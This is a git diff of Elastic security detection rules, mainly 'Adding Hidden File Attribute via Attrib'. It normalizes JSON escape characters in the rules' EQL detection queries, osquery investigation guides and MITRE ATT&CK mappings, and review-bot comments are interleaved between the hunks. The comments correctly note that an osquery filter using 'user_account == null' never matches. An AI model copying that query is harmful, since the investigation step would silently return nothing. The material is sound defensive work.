@@ -68,7 +68,7 @@ ], "risk_score": 47, "rule_id": "45d273fb-1dca-457d-9855-bcb302180c21", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_104.json b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_104.json index 8d76834eea2..39026681945 100644 --- a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_104.json +++ b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_104.json 
@@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "4630d948-40d4-4cef-ac69-4002e29bc3db", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_105.json b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_105.json index 4f4dfd63171..edf4a99aca5 100644 --- a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_105.json +++ b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_105.json 
@@ -70,7 +70,7 @@ ], "risk_score": 21, "rule_id": "4630d948-40d4-4cef-ac69-4002e29bc3db", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -104,7 +104,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_106.json b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_106.json index d387318324e..d5d00113348 100644 --- a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_106.json +++ b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_106.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Adding Hidden File Attribute via Attrib", - "note": "## Triage and analysis\n\n### Investigating Adding Hidden File Attribute via Attrib\n\nThe `Hidden` attribute is a file or folder attribute that makes the file or folder invisible to regular directory listings when the attribute is set. \n\nAttackers can use this attribute to conceal tooling and malware to prevent administrators and users from finding it, even if they are looking specifically for it.\n\nThis rule looks for the execution of the `attrib.exe` utility with a command line that indicates the modification of the `Hidden` attribute.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the target file or folder.\n - Examine the file, which process created it, header, etc.\n - If suspicious, retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Adding Hidden File Attribute via Attrib\n\nThe `Hidden` attribute is a file or folder attribute that makes the file or folder invisible to regular directory listings when the attribute is set. \n\nAttackers can use this attribute to conceal tooling and malware to prevent administrators and users from finding it, even if they are looking specifically for it.\n\nThis rule looks for the execution of the `attrib.exe` utility with a command line that indicates the modification of the `Hidden` attribute.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the target file or folder.\n - Examine the file, which process created it, header, etc.\n - If suspicious, retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"attrib.exe\" or process.pe.original_file_name == \"ATTRIB.EXE\") and process.args : \"+h\" and\n not\n (process.parent.name: \"cmd.exe\" and\n process.command_line: \"attrib +R +H +S +A *.cui\" and\n process.parent.command_line: \"?:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \\\"?:\\\\WINDOWS\\\\system32\\\\*.bat\\\"\")\n", "related_integrations": [ { @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -104,7 +104,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_107.json b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_107.json index eed917228d4..555d0b11c8c 100644 --- a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_107.json +++ b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_107.json 
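Review bot: The "Osquery - Retrieve Services Running on User Accounts" query carried in the new `note` line filters with `user_account == null`, which in SQLite (osquery's engine) evaluates to NULL rather than true/false, so `NOT (… OR user_account == null)` is never true and the query appears to return no rows for any service, defeating the investigation step. The null test should be `user_account IS NULL`, i.e. `NOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR user_account IS NULL)`. This is pre-existing guide text that the escape normalization (`\u003e` to `>`) carries through unchanged; the rule object it belongs to starts and ends outside the hunk, and the same text is repeated in the other versions of this rule in the diff.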
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Adding Hidden File Attribute via Attrib", - "note": "## Triage and analysis\n\n### Investigating Adding Hidden File Attribute via Attrib\n\nThe `Hidden` attribute is a file or folder attribute that makes the file or folder invisible to regular directory listings when the attribute is set. \n\nAttackers can use this attribute to conceal tooling and malware to prevent administrators and users from finding it, even if they are looking specifically for it.\n\nThis rule looks for the execution of the `attrib.exe` utility with a command line that indicates the modification of the `Hidden` attribute.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the target file or folder.\n - Examine the file, which process created it, header, etc.\n - If suspicious, retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Adding Hidden File Attribute via Attrib\n\nThe `Hidden` attribute is a file or folder attribute that makes the file or folder invisible to regular directory listings when the attribute is set. \n\nAttackers can use this attribute to conceal tooling and malware to prevent administrators and users from finding it, even if they are looking specifically for it.\n\nThis rule looks for the execution of the `attrib.exe` utility with a command line that indicates the modification of the `Hidden` attribute.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the target file or folder.\n - Examine the file, which process created it, header, etc.\n - If suspicious, retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"attrib.exe\" or process.pe.original_file_name == \"ATTRIB.EXE\") and process.args : \"+h\" and\n not\n (process.parent.name: \"cmd.exe\" and\n process.command_line: \"attrib +R +H +S +A *.cui\" and\n process.parent.command_line: \"?:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \\\"?:\\\\WINDOWS\\\\system32\\\\*.bat\\\"\")\n", "related_integrations": [ { @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -103,7 +103,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_108.json b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_108.json index 0d6a4b32ef8..e0c9184d33f 100644 --- a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_108.json +++ b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_108.json 
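Review bot: As in the _106 version of this rule, the services osquery in the new `note` line uses `user_account == null`, which yields NULL in SQLite and makes the whole `NOT (…)` predicate non-true for every row, so the "Services Running on User Accounts" query appears to never return results. Changing it to `user_account IS NULL` restores the intended filter. The surrounding rule object begins and ends outside the hunk; only the escape normalization is new here, the defect is inherited from the guide text.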
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Adding Hidden File Attribute via Attrib",
- "note": "## Triage and analysis\n\n### Investigating Adding Hidden File Attribute via Attrib\n\nThe `Hidden` attribute is a file or folder attribute that makes the file or folder invisible to regular directory listings when the attribute is set. \n\nAttackers can use this attribute to conceal tooling and malware to prevent administrators and users from finding it, even if they are looking specifically for it.\n\nThis rule looks for the execution of the `attrib.exe` utility with a command line that indicates the modification of the `Hidden` attribute.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the target file or folder.\n - Examine the file, which process created it, header, etc.\n - If suspicious, retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating Adding Hidden File Attribute via Attrib\n\nThe `Hidden` attribute is a file or folder attribute that makes the file or folder invisible to regular directory listings when the attribute is set. \n\nAttackers can use this attribute to conceal tooling and malware to prevent administrators and users from finding it, even if they are looking specifically for it.\n\nThis rule looks for the execution of the `attrib.exe` utility with a command line that indicates the modification of the `Hidden` attribute.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the target file or folder.\n - Examine the file, which process created it, header, etc.\n - If suspicious, retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
